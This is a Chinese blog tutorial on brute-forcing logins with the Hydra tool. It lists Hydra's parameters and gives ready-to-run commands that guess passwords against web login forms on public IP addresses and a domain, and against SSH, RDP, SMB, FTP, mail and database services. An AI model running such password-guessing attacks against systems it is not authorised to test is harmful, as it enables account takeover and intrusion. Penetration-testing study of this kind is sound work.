美文网首页
使用Hydra对基本身份验证进行暴力破解攻击

使用Hydra对基本身份验证进行暴力破解攻击

作者: migrate_ | 来源:发表于2024-05-19 08:38 被阅读0次

Hydra基本参数

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R 继续从上一次进度接着破解。
-S 采用SSL链接。
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户,对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。
-P FILE 大写,指定密码字典。
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数,默认为16。
-w TIME 设置最大超时的时间,单位秒,默认是30s。
-v / -V 显示详细过程。
server 目标ip
service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。
OPT 可选项

破解https的post:

hydra -t 3 -l admin -P weak-passwd.txt -o out.txt -f mxq.16969.xyz -S  http-post-form "/index.php/admin/login/loginin:username=^USER^&password=^PASS^:错误" -vV

破解http的post:

hydra -t 3 -l admin -P weak-passwd.txt -o out.txt -f 106.15.235.168 http-post-form "/pikachu/vul/burteforce/bf_form.php:username=^USER^&password=^PASS^:wrong username or password"

破解http的get:

hydra -l kobe -P top3000.txt -f 106.15.235.168 http-get-form "/pikachu/vul/csrf/csrfget/csrf_get_login.php:username=^USER^&password=^PASS^&submit=Login:F=登录失败" -t 3 -vV

指定端口

hydra -t 3 -l bee -P weak-passwd.txt -o out.txt -f 47.94.94.176 http-post-form "/bWAPP/bWAPP/login.php:login=^USER^&password=^PASS^&security_level=0&form=submit:activated" -s 8091 -vV

Hydra爆破常见服务

爆破SSH

hydra -l root -p 12345678 192.168.31.173 ssh

远程桌面(RDP)

hydra -l administrator -P 密码字典 192.168.31.173 rdp

共享文件(SMB)

hydra -l administrator -P 密码字典 192.168.31.173 smb

文件传输(FTP)

hydra -l 用户名 -P 密码字典 192.168.31.173 ftp 

邮箱协议(POP3)

hydra -l 用户名 -P 密码字典 192.168.31.173 pop3

MSSQL数据库

hydra -l sa -P 密码字典 192.168.31.173 mssql

MySQL数据库

hydra -l 用户名 -P 密码字典 192.168.31.173 mysql

Oracle数据库

hydra -l 用户名 -P 密码字典 192.168.31.173 oracle

Redis数据库

hydra -l 用户名 -P 密码字典 192.168.31.173 redis

PgSQL数据库

hydra -l 用户名 -P 密码字典 192.168.31.173 postgresql

相关文章

网友评论

      本文标题:使用Hydra对基本身份验证进行暴力破解攻击

      本文链接:https://www.haomeiwen.com/subject/qljsidtx.html